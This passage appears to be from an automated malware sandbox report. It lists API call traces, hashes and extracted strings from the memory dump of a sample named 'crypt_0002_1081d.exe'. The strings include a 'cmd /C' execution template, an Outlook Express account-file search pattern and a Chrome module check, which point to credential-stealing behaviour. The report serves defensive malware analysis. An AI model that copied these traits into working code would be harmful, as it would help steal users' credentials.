  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name:d3d8sext.exe
Process MD5:B91092360DF199385AC3DC6C3AA8A0E3
Total matches:135
Initial Analysis Report:Open
Initial sample Analysis ID:61691
Initial sample SHA 256:66E3388A2CEDA528C7697FC7B76EDA99563A2118CEC4C17B7B20D3BF08378655
Initial sample name:crypt_0002_1081d.exe

Similar Executed Functions

Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
